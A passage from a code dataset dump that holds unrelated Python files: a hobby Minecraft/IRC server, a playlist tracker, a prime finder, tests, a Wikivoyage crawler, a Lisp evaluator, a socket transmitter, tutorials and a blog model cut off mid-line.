== \"TOPIC\":\n pass # Send RPL_TOPIC!\n elif command == \"NAMES\":\n pass # Send RPL_NAMEREPLY and RPL_ENDOFNAMES! \n elif command == \"QUIT\":\n self.disconnect(argument)\n elif command == \"PRIVMSG\":\n self.client.last_message = argument\n \n def send_packet(self, source, command, argument = None):\n packet = \":\"+source+\" \"+command\n if argument: packet+=\" :\"+argument\n packet = (packet+\"\\r\\n\").encode(\"utf-8\")\n print (packet)\n self.conn.send(packet)\n \n def send_message(self, message):\n #This is pending a rewrite!\n self.send_packet(\"*SERVER*\", \"PRIVMSG #main\", message)\n \n def send_spawn_player(self, client):\n pass\n # TODO: Actually make the player join, drop the server-forced message\n def send_despawn_player(self, client):\n pass\n def send_set_block(self, x, y, z, block): #This really shouldn't do anything.\n pass\n def send_player_teleport(self, client): pass\n \n def step(self):\n self.recv() \n\nclass Server:\n \"\"\" A class that handles the server. \"\"\"\n\n def __init__(self):\n self.port = 25565\n self.users = 1337\n self.max = 9001\n self.name = \"TwinServ 015 (Half-assed IRC support!)\"\n self.motd = \"This is the MOTD!\"\n self.public = True\n self.salt = \"deadbeef13337357\"\n self.url = None\n\n self.online_mode = False\n\n self.chat_color = \"f\"\n\n #self.last_pid = 0\n\n self.clients = []\n self.message_queue = []\n self.position_queue = []\n\n self.main = World()\n if os.path.exists(\"map.twnsrv\"):\n self.main.load(\"map.twnsrv\")\n else:\n self.main.create_landscape()\n self.main.save(\"map.twnsrv\")\n\n #print (str(self.main.gzip_map()))\n \n self.load_persistent_ids()\n\n def get_name_for_persistent_id(self,persistent_id):\n if persistent_id == 0:\n return \"SERVER (World Generation or Physics)\"\n else:\n return server.persistent_ids[persistent_id][0]\n \n def get_class_for_persistent_id(self,persistent_id):\n if persistent_id == 0:\n return 'SERVER'\n else:\n if server.persistent_ids[persistent_id][1] == 'OP':\n return 'OP'\n else:\n return 'USER'\n\n def set_class_for_persistent_id(self,persistent_id,cls):\n if persistent_id != 0:\n server.persistent_ids[persistent_id][1] = cls\n self.save_persistent_ids()\n\n def load_persistent_ids(self):\n self.persistent_ids = []\n self.persistent_ids.append(['##SERVER','']) ## 0 is a reserved value\n if os.path.exists(\"users.txt\"):\n file = open(\"users.txt\",'r')\n ids = file.readlines()\n for i in ids:\n j = i.rstrip()\n j = j.split(';')\n self.persistent_ids.append(j)\n file.close()\n \n def save_persistent_ids(self):\n file = open(\"users.txt\",'wb')\n for i in self.persistent_ids:\n if i[0]!='##SERVER': ## Item 0 ('##SERVER') is a reserved value\n ts = i[0]+';'+i[1]+'\\n'\n file.write(ts.encode())\n file.close()\n \n def find_persistent_id(self,name):\n for i in range(len(self.persistent_ids)):\n if self.persistent_ids[i][0] == name:\n return i\n return None\n \n def add_persistent_id(self,name):\n persistent_id = len(self.persistent_ids) ## This works because len would be the last index + 1, and then I append an item that becomes this index\n self.persistent_ids.append([name,''])\n self.save_persistent_ids()\n return persistent_id\n \n def bind(self):\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n first = True\n while True:\n try:\n self.s.bind(('',self.port))\n except socket.error:\n if first:\n print (\"Sorry, can't bind to port \"+str(self.port)+random.choice([\": trololol\", \": It's troll time!\", \": Notch needs to go visit a dentist.\"]))\n first = False\n else:\n print (\"Trolling in progress (\"+str(random.randint(-127,346))+\"% done)\"+random.choice([\" - This may take a while\", \" - Nearly done!\", \" - i troll u\", \" - Almost like Notch!\", \" - This totally isn't taking forever\", \" - lololololol\", \" - I bet you can't wait!\", \" - Your operating system must really hate you\", \" - Port binding is fun!\", \" - It will be released in the next 2 seconds!\", \" - Almost as complete as Episode 3!\", \" - You might want to Notch Time this one.\", \" - So, about mudkips...\", \"\\nTraceback (most recent call last):... Just kidding!\", \" - Do it. Hit ^C and make the pain stop!\", \"- May i recommand port {}?\".format(abs(random.randrange(self.port-64, self.port+64, 1))), \"\\nCan't bind, waiting 2 sec...\", \"\\n\"+zlib.decompress(b'x\\xda\\x8b\\x0ew\\x0c\\xf2\\xf3\\xf4s\\x8fUpN\\xccS/Q\\xc8NM-P(-PTp\\xc9LQ(\\xc9HU(\\xae,.I\\xcdU(\\xc9\\xccMUH\\xceH\\xccKO\\xd5Q\\xc8/R\\xc8,\\x86\\xc8\\xa6\\x16\\x95\\xa5\\x16)\\xe4\\x03\\x89\\x9c\\xfc\\xc4\\x94\\xd4\\x14{\\x00K\\xf7\\x1b\\xf8').decode(\"ascii\")]))\n if random.randint(0,50)==25:\n print (\"\"\"\"\"\")\n\n\n time.sleep(random.choice([1, 2, 3, math.pi, 5]))\n else: break\n self.s.setblocking(0)\n print (\"\\007All binded, listening!\")\n\n def check_for_clients(self):\n self.s.listen(1)\n try: \n conn, addr = self.s.accept()\n recv = conn.recv(1)\n conn.setblocking(0) # todo: move this up so that even the first byte is nonblocking #hinthint just moving it up one line won't help\n self.clients.append(Client(conn,addr, recv))\n except socket.error: return\n\n\n def send_heartbeat(self):\n params = urllib.parse.urlencode({'port': self.port, 'users': self.users, 'max': self.max, \"name\":self.name, \"public\":self.public, \"version\":7, \"salt\":self.salt}) \n try: url = urllib.request.urlopen(\"http://www.minecraft.net/heartbeat.jsp?%s\" % params).read().strip()\n except urllib.error.HTTPError:\n print (\"Got HTTP error from heartbeat - is something invalid?\") ## This could also mean MC.net overloaded\n return None\n except urllib.error.URLError:\n print (\"Got URL error, minecraft.net might be down.\")\n return None\n print (url)\n return url\n\n\n\n def step(self):\n self.check_for_clients()\n # Stuff that doesn't enter the queue, and should be sent right away\n for client in self.clients:\n client.step()\n if client.despawn == True:\n for client2 in self.clients:\n if client is not client2:\n client2.protocol.send_despawn_player(client)\n self.message_queue.append(\"{}§{} disconnected{}.\".format(client.format_name(), self.chat_color, \" (\"+client.disconnect_reason+\")\" if client.disconnect_reason else \"\"))\n # del self.clients[client.pid] #For now just not registering them should be fine.\n client.despawn = False\n client.disconnected = True\n\n if client.spawned == False:\n if client.positionable:\n print (client.positionable, client.x, client.y, client.z, client.pos_changed)\n for client2 in self.clients:\n if client is not client2 and client2.disconnected == False:\n #print (\"Spawning {} for {}\".format(client, client2))\n client2.protocol.send_spawn_player(client)\n client.protocol.send_spawn_player(client2)\n self.message_queue.append(\"{}§{} ({}) has joined the game.\".format(client.format_name(), self.chat_color, client.protocol))\n client.spawned = True\n \n last_message = client.get_last_message()\n if last_message != None:\n self.message_queue.append(\"<{}§{}> {}\".format(client.format_name(), self.chat_color, last_message))\n if client.pos_changed == True and client.spawned == True:\n client.pos_changed = False\n for client2 in self.clients:\n if client is not client2:\n client2.protocol.send_player_teleport(client)\n \n # Stuff that /does/ enter the queue and gets send when it's fully collected\n for client in self.clients:\n for message in self.message_queue:\n print (message)\n client.message_queue.append(message)\n for x, y, z in self.main.block_queue:\n #if client.pid != self.main.map[x][y][z].changed_by: #TODO!!! CURRENTLY IT SENDS CHANGES BY THE CLIENT BACK \n client.block_queue.append((x, y, z))\n \n self.message_queue = []\n self.main.block_queue = []\n \nserver = Server()\nserver.bind()\nwhile True:\n #server.send_heartbeat()\n server.step()\n \n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":78827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"412490888","text":"#!/usr/bin/env python3\n\nfrom tinydb import TinyDB, where\nimport time\nimport os\nimport json\nimport argparse\nimport pathlib\n\n\nclass YoutubePlaylistTracker:\n def __init__(self, db_path):\n self.db = TinyDB(os.path.normpath(os.path.join(db_path, \"db.tinydb\")))\n self.update_time = time.time()\n\n def handle_batch(self, batch_file_path):\n with open(batch_file_path) as b_file:\n batch = json.load(b_file)\n\n for v in filter(lambda x: x is not None, batch[\"entries\"]):\n v[\"__update_time\"] = self.update_time\n self.db.upsert(v, where(\"id\") == v[\"id\"])\n\n self.check_updated()\n\n def check_updated(self):\n latest_time = sorted(\n self.db.all(), key=lambda doc: doc[\"__update_time\"], reverse=True\n )[0][\"__update_time\"]\n for v in self.db.search(where(\"__update_time\") != latest_time):\n print(\"{} was not updated. [{}]\".format(v[\"title\"], v[\"id\"]))\n\n\ndef get_latest_batch_from_folder(folder):\n import re\n\n try:\n batch = sorted(\n filter(\n lambda file: re.match(\n r\"[0-9]+_[0-9]+_[0-9]+_[0-9]+__HISTORY.json\", file\n ),\n os.listdir(folder),\n ),\n reverse=True,\n )[0]\n return os.path.normpath(os.path.join(folder, batch))\n except IndexError:\n exit(print(\"No batch json file on folder {}.\".format(folder)))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--check\", action=\"store_true\", help=\"Only check\")\n parser.add_argument(\n \"folder\",\n nargs=\"?\",\n help=\"The playlist folder (has historical playlist information in tinydb.json)\",\n default=pathlib.Path().absolute(),\n )\n parser.add_argument(\n \"batch\",\n nargs=\"?\",\n help=\"\"\"\n Path to JSON dump from Youtube-DL to update the database with.\n If left unset, it expects a file in the format year_month_date_timestamp.json to be in the folder, and it will pick the latest one (sorted in descending order by file name) as the batch.\n \"\"\",\n default=None,\n )\n args = parser.parse_args()\n\n db = YoutubePlaylistTracker(args.folder)\n if args.check:\n db.check_updated()\n else:\n batch = args.batch\n if batch is None:\n batch = get_latest_batch_from_folder(args.folder)\n # exit(print(batch))\n\n db.handle_batch(batch)\n","sub_path":"youtube-playlist-tracker/update_playlist.py","file_name":"update_playlist.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90063091","text":"from collections import defaultdict\nimport pickle\n\nt_c_dic = defaultdict(int)\nt_dic = defaultdict(int)\nc_dic = defaultdict(int)\n\nfor line in open('knock82.txt'):\n t, c = line.split('\\t')\n cs = c.split()\n t_dic[t] += 1 \n for c in cs:\n t_c_dic[t + ' ' + c] += 1\n c_dic[c] += 1\nN = sum(t_c_dic.values())\n\nwith open('knock83.txt', 'wb') as w_f:\n pickle.dump((dict(t_c_dic), dict(t_dic), dict(c_dic), N), w_f)\n\n\n\n","sub_path":"arai/chapter09/knock83.py","file_name":"knock83.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488938192","text":"\nimport time\n\n\"\"\"\nFind large number primes.\nGoal: Find prime numbers that are more than 6 digits.\n\"\"\"\n\n###################\n##1. Brute Force ##\n###################\n\ndef brute_prime_finder(num, digits):\n # \"num\": number of primes I want\n # \"digits\": number of digits I want my primes to be\n\n start_t = time.perf_counter()\n\n if digits == 1:\n return [2,3,5,7]\n\n total_primes = []\n number = 10\n while len(total_primes) < num or (number // (10 ** digits) != 0):\n if number // (10 ** (digits-1)) != 0: #if number is in the range for number of digits we want\n if is_prime(number):\n total_primes.append(number)\n number += 1\n\n end_t = time.perf_counter()\n return total_primes, (end_t - start_t)\n\ndef is_prime(num):\n if num == 1:\n return False\n i = 2\n while i != num:\n if num % i == 0:\n return False\n i += 1\n return True\n\ndef factor_num(num):\n all_factors = []\n i = 1\n while i != (num + 1):\n if not(num % i):\n all_factors.append(i)\n i += 1\n return all_factors\n","sub_path":"find_primes.py","file_name":"find_primes.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"163967159","text":"import pytest\nfrom trinity.tools.async_process_runner import AsyncProcessRunner\nfrom trinity._utils.async_iter import (\n contains_all,\n)\n\n\n@pytest.mark.parametrize(\n 'command',\n (\n ('trinity-beacon', 'testnet', \"--num=1\", \"--genesis-delay=10\"),\n ('trinity-beacon', 'testnet', \"--num=1\", \"--genesis-time=1559315137\"),\n )\n)\n@pytest.mark.asyncio\nasync def test_directory_generation(command, tmpdir):\n testnet_path = tmpdir / \"testnet\"\n testnet_path.mkdir()\n command = command + (f\"--network-dir={testnet_path}\", )\n async with AsyncProcessRunner.run(command, timeout_sec=30) as runner:\n assert await contains_all(runner.stderr, {\n \"Network generation completed\",\n })\n\n\n@pytest.mark.parametrize(\n 'command',\n (\n ('trinity-beacon', 'testnet', \"--num=1\",),\n )\n)\n@pytest.mark.asyncio\nasync def test_missing_genesis_time_arg(command):\n async with AsyncProcessRunner.run(command, timeout_sec=30) as runner:\n assert await contains_all(runner.stderr, {\n \"one of the arguments --genesis-delay --genesis-time is required\",\n })\n","sub_path":"tests/components/eth2/network_generator/test_network_generator.py","file_name":"test_network_generator.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"268417864","text":"import random\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth.models import User\n\nfrom blog.models import Article\n\nclass Command(BaseCommand):\n help = 'Crreate test article'\n\n def add_arguments(self, parser):\n parser.add_argument('coll_article')\n\n def handle(self, *args, **options):\n coll_article = int(options.get('coll_article'))\n user = User.objects.all()\n for item in range(coll_article):\n user_ = random.choice(user)\n article = Article(\n title = 'title{}'.format(item),\n text = 'text{}'.format(item),\n user = user_\n )\n article.save()","sub_path":"blog/management/commands/create_test_article.py","file_name":"create_test_article.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"300442285","text":"\n#!/usr/bin/python3\n#import pywikibot\nimport os\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\n\n# url list creation by city\n# request the text by city\n\"\"\"\ncreate file_name by city url\n\"\"\"\nurl_list_file_name = \"pintween_wikivoyage_url_list.txt\"\nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\n\n\n\n\"\"\"\nPython multi-line comments\n\"\"\"\ndef create_filename(url):\n url_words = url.split(\"/\")\n url_header_word = \"\"\n\n for block in url_words:\n if block == \"https:\":\n # do nothing\n continue\n elif block == \"wiki\":\n # do nothing\n continue\n elif block == \"\":\n # do nothing\n continue\n else:\n url_header_word += block + \"_\"\n\n now = datetime.now()\n date_time = now.strftime(\"%m%d_%Y_%H%M%S\")\n file_name_withURL = url_header_word + \"_\" + date_time + \".txt\"\n\n return file_name_withURL\n\n\n\n\n\"\"\"\nfetch URLs from wikivoyage\n\"\"\"\nwith open(url_list_file_name) as openfileobject:\n for wikivoyage_url in openfileobject:\n print(wikivoyage_url)\n wikivoyage_page = requests.get(wikivoyage_url.rstrip())\n if wikivoyage_page.status_code == 200:\n file_name_withURL = create_filename(wikivoyage_url.rstrip())\n pintween_file_name = os.path.join(THIS_FOLDER, file_name_withURL)\n pintween_file_crawled = open(pintween_file_name, \"wb+\")\n pintween_file_crawled.write(wikivoyage_page.content)\n pintween_file_crawled.close()\n print(\"the URL cralwed successfully: \" + wikivoyage_url)\n else:\n print(\"Error to fetch the URL: \" + wikivoyage_url + \"Error Code: \" + str(wikivoyage_page.status_code))\n\n # Wait for 10 seconds\n print(\"waiting 60 seconds ...\")\n time.sleep(60)\n\n","sub_path":"pintween_url_crawler.py","file_name":"pintween_url_crawler.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"490231772","text":"import pdb\r\nfrom scan_lexer import Symbol\r\nfrom functools import reduce\r\nimport operator\r\n\r\n\r\nglobal_env = [\r\n (\"car\" , lambda x : x[0]) ,\r\n (\"cdr\" , lambda x : x[1:]) ,\r\n (\"max\" , max) ,\r\n (\"min\" , min) ,\r\n (\"+\" , lambda *x: reduce(operator.add, list(x))) ,\r\n (\"-\" , lambda *x: reduce(operator.sub, list(x)))\r\n]\r\n\r\n\r\ndef evaluate(exp, env = global_env):\r\n # pdb.set_trace()\r\n # Is exp an atom?\r\n if atom(exp):\r\n if type(exp) == Symbol:\r\n return lookup(exp, env)\r\n elif True in [isinstance(exp, x) for x in [int, float, str, bool]]:\r\n return exp\r\n else:\r\n raise TypeError(\"Unknown type atom\", exp)\r\n\r\n # Is exp the null list?\r\n if exp == []:\r\n return []\r\n\r\n # Is exp is a special form?\r\n elif exp[0] == \"quote\":\r\n return exp[1]\r\n elif exp[0] == \"if\":\r\n if istrue(evaluate(exp[1], env)):\r\n return evaluate(exp[2], env)\r\n else:\r\n return evaluate(exp[3], env)\r\n elif exp[0] == \"begin\":\r\n return eprogn(exp[1:], env)\r\n elif exp[0] == \"set!\":\r\n update(exp[1], env, evaluate(exp[2], env))\r\n elif exp[0] == \"lambda\":\r\n return make_function(exp[1], exp[2:], env)\r\n\r\n # exp is function application\r\n else:\r\n return invoke(evaluate(exp[0], env), evlist(exp[1:], env))\r\n\r\n\r\ndef atom(s):\r\n return not isinstance(s, list)\r\n\r\ndef istrue(exp):\r\n if exp == False:\r\n return False\r\n else:\r\n return True\r\n\r\ndef eprogn(exps, env):\r\n results = [evaluate(exp, env) for exp in exps]\r\n return results[-1]\r\n\r\ndef invoke(fn, arg_list):\r\n # pdb.set_trace()\r\n return fn(*arg_list)\r\n\r\ndef evlist(l, env):\r\n return [evaluate(x, env) for x in l]\r\n\r\n# update is impure.\r\ndef update(var, env, value):\r\n # pdb.set_trace()\r\n for i in range(len(env)):\r\n if env[i][0] == var:\r\n env[i] = (var, value)\r\n return\r\n raise Exception(\"No such symbol found: \", var)\r\n \r\ndef make_function(variables, body, env):\r\n return lambda *values : evaluate(body[0], extend(env, variables, list(values)))\r\n\r\ndef lookup(var, env):\r\n for u, v in env:\r\n if u == var:\r\n\r\n\r\n\r\n return v\r\n raise Exception(\"No such binding: \", var)\r\n\r\ndef extend(env, variables, values):\r\n if len(variables) != len(values):\r\n raise ValueError(\"Too few or too many values.\")\r\n else:\r\n bindings = list(zip(variables, values))\r\n return bindings + env\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"126534719","text":"'''\nThe MIT License\n\nCopyright (c) 2010-2017 Josh A. Bosley, http://joshbosley.com\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n'''\n\nimport socket\nimport logging\n\n# Send the server a message\ndef outgoingQuery(address, port, query, logger=None, timeout=10):\n \n if logger is None:\n logger = logging.getLogger(__name__)\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(timeout)\n try:\n sock.connect((address, port))\n except:\n sock.close()\n logger.info(\"__SETUP__ERROR__\")\n return -1\n \n query = query.encode()\n\n # Send size of request to server\n sock.sendall(str(len(query)).encode())\n\n # Ensure server is ready\n try:\n verification = sock.recv(4096).decode(\"utf-8\")\n except:\n logger.info(\"Socket time out\")\n return -1\n\n if verification != \"__ACCEPTED__\":\n logger.warning(\"__FAILED_TO_SEND_SIZE__\")\n return -1\n \n # Send the data\n total = 0\n while total < len(query):\n sent = sock.send(query[total:])\n if 0 == sent:\n logger.warning(\"SOCKET BROKEN WHEN SENDING DATA\")\n total = total + sent\n \n # Check to make sure that the server got the request\t\n verification = sock.recv(4096).decode(\"utf-8\")\n if verification != \"__ACCEPTED__\":\n logger.info(\"NO ACCEPTANCE ON MESSAGE SEND\")\n return -3\n\n # Request sent, now get the response\n # Start by getting the size of the request\n try:\n size = sock.recv(4096)\n except:\n sock.sendall(\"__ERROR__\".encode())\n sock.close()\n return\n\n try:\n size = int(size)\n except:\n logger.warning(\"COULDNT VERIFY REQ SIZE FROM SERRRV\")\n sock.sendall(\"__ERROR__\".encode())\n sock.close()\n return\n\n # Inform the server that we accept their given size\n try:\n sock.sendall(\"__ACCEPTED__\".encode())\n except:\n sock.close()\n return -1\n\n # Receive the data\n chunks = []\n bytes_recd = 0\n while bytes_recd < size:\n try:\n chunk = sock.recv(min(size - bytes_recd, 1024))\n except:\n sock.close()\n return -4\n if chunk == b'':\n sock.close()\n logger.warning(\"BROKEN_SOCKET\")\n return -4\n chunks.append(chunk)\n bytes_recd = bytes_recd + len(chunk)\n \n # Assemble to plaintext\n resp = (b\"\".join(chunks))\n \n # Tell the server that we received the data\n try:\n sock.sendall(\"__ACCEPTED__\".encode())\n except:\n sock.close()\n return -1\n \n # Close the socket and pass back the response\n sock.close()\n return resp\n\n'''\n Testing the sending functionality\n'''\nif __name__ == \"__main__\":\n\n logging.basicConfig(format='%(asctime)s [TRANSMITTER]: %(message)s <%(levelname)s>')\n thelogger = logging.getLogger(__name__)\n\n t = \"*\" * 2 ** 25\n outgoingQuery(\"127.0.0.1\", 9000, t, thelogger)","sub_path":"Python/DigitalHills-Archive/obelisk-cab/connector/tcpout/transmitter.py","file_name":"transmitter.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515402660","text":"from typing import Union\n\nfrom fastapi import Body, FastAPI\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\n\nclass Item(BaseModel):\n name: str\n description: Union[str, None] = None\n price: float\n tax: Union[float, None] = None\n\n\nclass User(BaseModel):\n username: str\n full_name: Union[str, None] = None\n\n\n@app.put(\"/items/{item_id}\")\nasync def update_item(\n *,\n item_id: int,\n item: Item,\n user: User,\n importance: int = Body(gt=0),\n q: Union[str, None] = None,\n):\n results = {\"item_id\": item_id, \"item\": item, \"user\": user, \"importance\": importance}\n if q:\n results.update({\"q\": q})\n return results\n","sub_path":"docs_src/body_multiple_params/tutorial004.py","file_name":"tutorial004.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"156266613","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nimport torch.utils.data\nfrom models import vgg, resnet, densenet, base_cnn, TDNN\n\n# Training settings\nparser = argparse.ArgumentParser(description='Test architectures with dummy data')\nparser.add_argument('--model', choices=['cnn', 'vgg', 'resnet', 'densenet', 'tdnn'], default='resnet')\nparser.add_argument('--nclasses', type=int, default=10, metavar='N', help='number of classes')\nargs = parser.parse_args()\n\n\nif args.model == 'cnn':\n\tmodel = base_cnn.CNN(n_classes=args.nclasses)\nelif args.model == 'vgg':\n\tmodel = vgg.VGG('VGG11', n_classes=args.nclasses)\nelif args.model == 'resnet':\n\tmodel = resnet.ResNet12(n_classes=args.nclasses)\nelif args.model == 'densenet':\n\tmodel = densenet.DenseNet121(n_classes=args.nclasses)\nelif args.model == 'tdnn':\n\tmodel = TDNN.TDNN(n_classes=args.nclasses)\n\nprint('\\n', model, '\\n')\nprint('\\n\\nNumber of parameters: {}\\n'.format(sum(p.numel() for p in model.parameters())))\n\nbatch = torch.rand(3, 1, 40, 500)\n\nout = model.forward(batch)\n\nprint(out.size(), '\\n')","sub_path":"mel_spec/test_arch.py","file_name":"test_arch.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"625330239","text":"import argparse\nimport configparser\nimport os\n\n\ndef parse_config():\n parser = argparse.ArgumentParser(description='HypeTracker',\n prog='python -m hypetracker.main')\n parser.add_argument('-c', '--config', help=\"config file\")\n args = parser.parse_args()\n default = os.path.join(os.path.dirname(__file__), 'hypetracker.conf.example')\n configs = [default]\n args.config and configs.append(args.config)\n config = configparser.ConfigParser()\n config.read(configs)\n return config\n","sub_path":"hypetracker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"335579999","text":"import aetycoon\r\nimport datetime\r\nimport hashlib\r\nimport re\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext import deferred\r\n\r\nimport config\r\nimport generators\r\nimport markup\r\nimport static\r\nimport utils\r\n\r\n\r\nif config.default_markup in markup.MARKUP_MAP:\r\n DEFAULT_MARKUP = config.default_markup\r\nelse:\r\n DEFAULT_MARKUP = 'html'\r\n\r\n\r\nclass BlogDate(db.Model):\r\n \"\"\"Contains a list of year-months for published blog posts.\"\"\"\r\n\r\n @classmethod\r\n def get_key_name(cls, post):\r\n return '%d/%02d' % (post.published_tz.year, post.published_tz.month)\r\n\r\n @classmethod\r\n def create_for_post(cls, post):\r\n inst = BlogDate(key_name=BlogDate.get_key_name(post))\r\n inst.put()\r\n return inst\r\n\r\n @classmethod\r\n def datetime_from_key_name(cls, key_name):\r\n year, month = key_name.split('/')\r\n return datetime.datetime(int(year), int(month), 1, tzinfo=utils.tzinfo())\r\n\r\n @property\r\n def date(self):\r\n return BlogDate.datetime_from_key_name(self.key().name()).date()\r\n\r\n\r\nclass BlogPost(db.Model):\r\n # The URL path to the blog post. Posts have a path iff they are published.\r\n path = db.StringProperty()\r\n title = db.StringProperty(required=True, indexed=False)\r\n body_markup = db.StringProperty(choices=set(markup.MARKUP_MAP),\r\n default=DEFAULT_MARKUP)\r\n body = db.TextProperty(required=True)\r\n tags = aetycoon.SetProperty(basestring, indexed=False)\r\n published = db.DateTimeProperty()\r\n updated = db.DateTimeProperty(auto_now=False)\r\n deps = aetycoon.PickleProperty()\r\n original_author_as_user = db.UserProperty() # User object for original author\r\n original_author_name = db.StringProperty() # User name string for original author\r\n editors = db.StringListProperty() # User name strings for subsequent editors\r\n locked = db.BooleanProperty(default=True) # Determines whether the post is locked from being edited. Defaults to true.\r\n\r\n @property\r\n def published_tz(self):\r\n return utils.tz_field(self.published)\r\n\r\n @property\r\n def updated_tz(self):\r\n return utils.tz_field(self.updated)\r\n\r\n @aetycoon.TransformProperty(tags)\r\n def normalized_tags(tags):\r\n return list(set(utils.slugify(x.lower()) for x in tags))\r\n \r\n def normalized_original_author_name(self):\r\n return utils.slugify(original_author_name.lower())\r\n\r\n @property\r\n def tag_pairs(self):\r\n return [(x, utils.slugify(x.lower())) for x in self.tags]\r\n\r\n @property\r\n def rendered(self):\r\n \"\"\"Returns the rendered body.\"\"\"\r\n return markup.render_body(self)\r\n\r\n @property\r\n def summary(self):\r\n \"\"\"Returns a summary of the blog post.\"\"\"\r\n return markup.render_summary(self)\r\n\r\n @property\r\n def hash(self):\r\n val = (self.title, self.body, self.published)\r\n return hashlib.sha1(str(val)).hexdigest()\r\n\r\n @property\r\n def summary_hash(self):\r\n val = (self.title, self.summary, self.tags, self.published)\r\n return hashlib.sha1(str(val)).hexdigest()\r\n \r\n @property\r\n def tags_hash(self):\r\n \"\"\" Hash of tags only, used by TagCloudContentGenerator\r\n @author Tom Allen \"\"\"\r\n val = (self.tags)\r\n return hashlib.sha1(str(val)).hexdigest()\r\n\r\n def publish(self):\r\n regenerate = False\r\n if not self.path:\r\n num = 0\r\n content = None\r\n while not content:\r\n \"\"\" Tries to find a unique URL for this post, and adds the content\r\n to the datastore when it finds one. \"\"\"\r\n path = utils.format_post_path(self, num)\r\n content = static.add(path, '', config.html_mime_type)\r\n num += 1\r\n self.path = path\r\n self.put()\r\n # Force regenerate on new publish. Also helps with generation of\r\n # chronologically previous and next page.\r\n regenerate = True\r\n\r\n # Create BlogDate and TagCounter objects given the data for this post.\r\n BlogDate.create_for_post(self)\r\n TagCounter.create_for_post(self)\r\n\r\n \"\"\" For every type of generated content (indexes, tags, etc) dependent\r\n upon this particular post:\r\n i) Fetch the current list of resources and etag from the current\r\n ContentGenerator\r\n ii) Fetch the stored list of resources and etag from self.deps\r\n iii) If the etag has changed, we need to regenerate all resources - so we\r\n set to_regenerate to the union of the old and new resources.\r\n iv) If the etag has not changed, we only need to regenerate added or\r\n removed resources - so we set to_regenerate to the symmetric difference of\r\n the old and new resources.\r\n v) For each resource that needs regenerating, we call generate_resource().\r\n vi) Finally, we update the BlogPost's list of deps with the new set of\r\n resources and etag.\r\n \r\n Later edit: The only change here is that we check if the ContentGenerator\r\n permits deferred execution. If it doesn't, we execute generate_resource\r\n as normal, but if it does, we call deferred.defer for each changed\r\n dependency.\r\n \r\n (Some of this sequence is now encapsulated in other functions, but it's\r\n doing roughly the same thing still.)\r\n \"\"\"\r\n for generator_class, deps in self.get_deps(regenerate=regenerate):\r\n for dep in deps:\r\n if generator_class.can_defer:\r\n deferred.defer(generator_class.generate_resource, None, dep)\r\n else:\r\n generator_class.generate_resource(self, dep)\r\n self.put()\r\n\r\n def remove(self):\r\n if not self.is_saved():\r\n return\r\n # It is important that the get_deps() return the post dependency\r\n # before the list dependencies as the BlogPost entity gets deleted\r\n # while calling PostContentGenerator.\r\n for generator_class, deps in self.get_deps(regenerate=True):\r\n for dep in deps:\r\n if generator_class.can_defer:\r\n deferred.defer(generator_class.generate_resource, None, dep)\r\n else:\r\n if generator_class.name() == 'PostContentGenerator':\r\n generator_class.generate_resource(self, dep, action='delete')\r\n self.delete()\r\n else:\r\n generator_class.generate_resource(self, 